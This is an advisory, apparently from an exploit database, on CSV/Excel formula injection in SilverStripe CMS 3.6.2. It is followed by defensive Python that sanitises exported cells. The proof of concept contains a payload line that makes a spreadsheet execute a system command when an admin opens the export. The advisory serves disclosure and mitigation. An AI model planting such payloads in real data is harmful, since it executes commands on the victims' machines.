
Exploit Title: SilverStripe CMS 3.6.2 - CSV Excel Macro Injection
Vendor Homepage: https://www.silverstripe.org/
Software Link: https://www.silverstripe.org/download
Discovered by: Ishaq Mohammed
Contact: https://twitter.com/security_prince
Website: https://about.me/security-prince
Category: web apps
Platform: PHP

Description:

In the CSV export feature of the SilverStripe CMS, it is possible for the
output to contain macros and scripts which, if imported without
sanitization into software (including Microsoft Excel), may be executed.

Proof of Concept

Steps to Reproduce:

1. Log in with a normal user's credentials
2. Access the below URL via your browser:
http://localhost/SilverStripe/admin/myprofile
3. Enter the below payload in the "First Name" field and save the profile:
@SUM(1+1)*cmd|' /C calc'!A0
4. Log in with the admin's credentials in a different browser
5. Access the security page at the below link:
http://localhost/SilverStripe/admin/security/
6. Click on the "Export to CSV" option and open the exported CSV file in any
spreadsheet application

Solution:

The issue has been fixed in the latest release of SilverStripe, which can be
downloaded from here: https://www.silverstripe.org/download

Reference:

https://www.silverstripe.org/download/security-releases/ss-2017-007
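As an added, stand-alone illustration (not SilverStripe's code and not the vendor's fix), the following Python shows the defensive pattern behind this class of bug: a CSV export that neutralises cells a spreadsheet would parse as formulas, plus an audit helper that flags which cells an unpatched export would have emitted as formulas. The member rows are constructed sample data; the first uses the advisory's own payload.

```python
import csv
import io

# Leading characters that Excel/LibreOffice interpret as the start of a
# formula when a CSV cell is imported (tab and CR cover cell-splitting tricks).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(cell: str) -> bool:
    """True if a spreadsheet would evaluate this cell rather than show it."""
    return cell.startswith(FORMULA_TRIGGERS)


def neutralise_cell(cell):
    """Prefix formula-like cells with a single quote so they import as text.

    Spreadsheet applications treat a leading apostrophe as "this is a literal
    string" and do not display it. Non-string values (ints, None) are passed
    through; CSV quoting of commas and double quotes is left to csv.writer.
    Caveat: legitimate values such as "-5" are also prefixed, so apply this
    only to free-text columns or accept the cosmetic change.
    """
    if not isinstance(cell, str) or not is_formula_like(cell):
        return cell
    return "'" + cell


def export_rows(rows, fieldnames):
    """Hardened export: write rows as CSV text with every cell neutralised."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralise_cell(v) for k, v in row.items()})
    return buf.getvalue()


def find_injected_cells(rows):
    """Audit helper: (row index, column) of cells an unpatched export would emit as formulas."""
    return [(i, k) for i, row in enumerate(rows)
            for k, v in row.items() if isinstance(v, str) and is_formula_like(v)]


# Constructed sample members; row 0 carries the advisory's payload, row 1 a harmless formula.
SAMPLE_MEMBERS = [
    {"FirstName": "@SUM(1+1)*cmd|' /C calc'!A0", "Surname": "Doe", "Email": "a@example.com"},
    {"FirstName": "=1+1", "Surname": "Roe", "Email": "b@example.com"},
    {"FirstName": "Alice", "Surname": "Smith", "Email": "alice@example.com"},
]

if __name__ == "__main__":
    print(find_injected_cells(SAMPLE_MEMBERS))
    print(export_rows(SAMPLE_MEMBERS, ["FirstName", "Surname", "Email"]))
```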